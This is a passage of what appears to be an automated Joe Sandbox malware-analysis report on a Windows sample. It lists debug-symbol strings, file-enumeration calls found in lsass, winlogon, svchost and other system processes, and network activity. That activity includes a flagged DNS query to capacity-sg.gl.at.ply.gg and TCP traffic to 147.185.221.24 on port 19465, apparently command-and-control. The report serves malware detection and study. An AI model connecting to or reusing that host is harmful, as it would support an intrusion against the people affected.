Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000019.00000000.2239543415.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3524269971.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000019.00000000.2239543415.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3524269971.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000019.00000000.2239543415.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3524269971.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000019.00000002.3523139455.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239439569.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000019.00000000.2239543415.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3524269971.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000019.00000000.2239543415.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3524269971.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorb source: svchost.exe, 00000019.00000002.3523139455.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239439569.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ~1.PDB @ source: svchost.exe, 00000019.00000000.2239543415.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3524269971.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000000.2239439569.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.3523139455.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239439569.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E85898DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_000001E85898DA18
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E85898D894 FindFirstFileExW,8_2_000001E85898D894
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E8589BDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_000001E8589BDA18
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E8589BD894 FindFirstFileExW,8_2_000001E8589BD894
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E8589EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_000001E8589EDA18
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E8589ED894 FindFirstFileExW,8_2_000001E8589ED894
Source: C:\Windows\System32\lsass.exeCode function: 9_2_00000140AE86D894 FindFirstFileExW,9_2_00000140AE86D894
Source: C:\Windows\System32\lsass.exeCode function: 9_2_00000140AE86DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,9_2_00000140AE86DA18
Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000195DD5CD894 FindFirstFileExW,12_2_00000195DD5CD894
Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000195DD5CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,12_2_00000195DD5CDA18
Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000195DE1ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,12_2_00000195DE1ADA18
Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000195DE1AD894 FindFirstFileExW,12_2_00000195DE1AD894
Source: C:\Windows\System32\cmd.exeCode function: 13_2_00000192913ED894 FindFirstFileExW,13_2_00000192913ED894
Source: C:\Windows\System32\cmd.exeCode function: 13_2_00000192913EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,13_2_00000192913EDA18
Source: C:\Windows\System32\cmd.exeCode function: 13_2_000001929162D894 FindFirstFileExW,13_2_000001929162D894
Source: C:\Windows\System32\cmd.exeCode function: 13_2_000001929162DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,13_2_000001929162DA18
Source: C:\Windows\System32\conhost.exeCode function: 14_2_00000139F96DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,14_2_00000139F96DDA18
Source: C:\Windows\System32\conhost.exeCode function: 14_2_00000139F96DD894 FindFirstFileExW,14_2_00000139F96DD894
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CB3D894 FindFirstFileExW,15_2_000001160CB3D894
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CB3DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000001160CB3DA18
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CB9D894 FindFirstFileExW,15_2_000001160CB9D894
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CB9DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000001160CB9DA18
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CBCD894 FindFirstFileExW,15_2_000001160CBCD894
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CBCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000001160CBCDA18
Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000257E10AD894 FindFirstFileExW,19_2_00000257E10AD894
Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000257E10ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,19_2_00000257E10ADA18
Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000257E10DD894 FindFirstFileExW,19_2_00000257E10DD894
Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000257E10DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,19_2_00000257E10DDA18
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000001428DD0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_000001428DD0DA18
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000001428DD0D894 FindFirstFileExW,20_2_000001428DD0D894
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000001428DD3DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_000001428DD3DA18
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000001428DD3D894 FindFirstFileExW,20_2_000001428DD3D894
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001F28C93D894 FindFirstFileExW,21_2_000001F28C93D894
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001F28C93DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_000001F28C93DA18
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001F28C96D894 FindFirstFileExW,21_2_000001F28C96D894
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001F28C96DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_000001F28C96DA18
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000001CA9854D894 FindFirstFileExW,22_2_000001CA9854D894
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000001CA9854DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_000001CA9854DA18
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001D26531D894 FindFirstFileExW,23_2_000001D26531D894
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001D26531DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,23_2_000001D26531DA18
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001D26534D894 FindFirstFileExW,23_2_000001D26534D894
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001D26534DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,23_2_000001D26534DA18
Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000254A2D4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,24_2_00000254A2D4DA18
Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000254A2D4D894 FindFirstFileExW,24_2_00000254A2D4D894
Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000024B87DDD894 FindFirstFileExW,25_2_0000024B87DDD894
Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000024B87DDDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,25_2_0000024B87DDDA18
Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000024B8848DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,25_2_0000024B8848DA18
Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000024B8848D894 FindFirstFileExW,25_2_0000024B8848D894
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00000205FD40DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_00000205FD40DA18
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00000205FD40D894 FindFirstFileExW,26_2_00000205FD40D894
Source: C:\Windows\System32\svchost.exeCode function: 29_2_000001A2056ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,29_2_000001A2056ADA18
Source: C:\Windows\System32\svchost.exeCode function: 29_2_000001A2056AD894 FindFirstFileExW,29_2_000001A2056AD894
Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000018EC1F6D894 FindFirstFileExW,30_2_0000018EC1F6D894
Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000018EC1F6DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,30_2_0000018EC1F6DA18
Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000025CE3E0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,31_2_0000025CE3E0DA18
Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000025CE3E0D894 FindFirstFileExW,31_2_0000025CE3E0D894
Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000025CE417D894 FindFirstFileExW,31_2_0000025CE417D894
Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000025CE417DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,31_2_0000025CE417DA18

Networking

barindex
Source: C:\Windows\System32\svchost.exeDomain query: capacity-sg.gl.at.ply.gg
Source: global trafficTCP traffic: 147.185.221.24 ports 19465,1,4,5,6,9
Source: global trafficTCP traffic: 192.168.2.5:49736 -> 147.185.221.24:19465
Source: Joe Sandbox ViewIP Address: 147.185.221.24 147.185.221.24
Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: capacity-sg.gl.at.ply.gg
Source: lsass.exe, 00000009.00000002.3545283451.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135334573.00000140AE074000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://3csp.icrosof4m/ocp0
Source: lsass.exe, 00000009.00000000.2135605557.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135334573.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135138922.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3540727901.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3553913064.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 00000009.00000003.2240150691.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135212496.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2607196609.00000140AE19E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000009.00000000.2134355094.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: lsass.exe, 00000009.00000002.3559749665.00000140AE208000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: lsass.exe, 00000009.00000002.3555641762.00000140AE1B7000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135605557.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2186869203.00000140AE1B6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135605557.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135334573.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135138922.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3553913064.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: svchost.exe, 00000014.00000000.2213030346.000001428A879000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3601346126.000001428A879000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.(
Source: svchost.exe, 00000014.00000000.2213030346.000001428A879000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3601346126.000001428A879000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
Source: svchost.exe, 00000014.00000000.2213088609.000001428A88A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3601746570.000001428A88A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: lsass.exe, 00000009.00000000.2135605557.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135334573.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135138922.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3540727901.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3553913064.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 00000009.00000003.2240150691.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135212496.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2607196609.00000140AE19E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000009.00000002.3559749665.00000140AE208000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: lsass.exe, 00000009.00000000.2134355094.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: lsass.exe, 00000009.00000002.3555641762.00000140AE1B7000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135605557.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2186869203.00000140AE1B6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135605557.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135334573.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135138922.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3553913064.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 00000009.00000003.2240150691.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3549489785.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2607196609.00000140AE19E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000009.00000003.2240150691.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135212496.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2607196609.00000140AE19E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000009.00000000.2134355094.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: lsass.exe, 00000009.00000002.3555641762.00000140AE1B7000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135605557.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2186869203.00000140AE1B6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135605557.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135334573.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135138922.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3553913064.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: svchost.exe, 00000014.00000002.3606969024.000001428B117000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2350631269.0000024066840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2350495308.0000024066821000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2350576370.000002406682A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2479320958.0000024066840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2479104021.0000024066821000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2479222787.000002406682A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
Source: lsass.exe, 00000009.00000002.3531354723.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134355094.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000009.00000002.3531354723.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134355094.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2261094354.000001428A8E3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.2212631582.000001428A813000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3601346126.000001428A879000.00000004.00000001.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.20.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: svchost.exe, 00000014.00000002.3600184851.000001428A840000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab3D
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.20.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: svchost.exe, 00000014.00000002.3601346126.000001428A879000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cabIBi
Source: svchost.exe, 00000014.00000003.2261094354.000001428A8E3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3602584883.000001428A8DC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2263746615.000001428A8E4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3603497811.000001428A8F6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.2212687583.000001428A82B000.00000004.00000001.00020000.00000000.sdmp, FB0D848F74F70BB2EAA93746D24D97491.20.dr, FB0D848F74F70BB2EAA93746D24D97490.20.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab
Source: svchost.exe, 00000014.00000002.3600184851.000001428A840000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab3D
Source: svchost.exe, 00000014.00000002.3607685052.000001428B138000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3601746570.000001428A88A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?c645b6828f94f
Source: svchost.exe, 00000014.00000002.3608179611.000001428B14C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?c645b6828f
Source: lsass.exe, 00000009.00000002.3527020051.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000009.00000000.2134285461.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3528269548.00000140AD850000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000009.00000002.3527020051.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: svchost.exe, 00000014.00000000.2213030346.000001428A879000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.2213363373.000001428A8F6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.2212687583.000001428A82B000.00000004.00000001.00020000.00000000.sdmp, E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB041.20.dr, E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A0.20.dr, E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB040.20.dr, E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB6151870.20.dr, 80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868.20.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uN
Source: svchost.exe, 00000014.00000000.2213152446.000001428A8AF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8
Source: lsass.exe, 00000009.00000003.2240150691.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135605557.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134355094.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135334573.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135138922.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135212496.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3540727901.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2607196609.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3553913064.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3559749665.00000140AE208000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000009.00000003.2240150691.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3549489785.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2607196609.00000140AE19E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
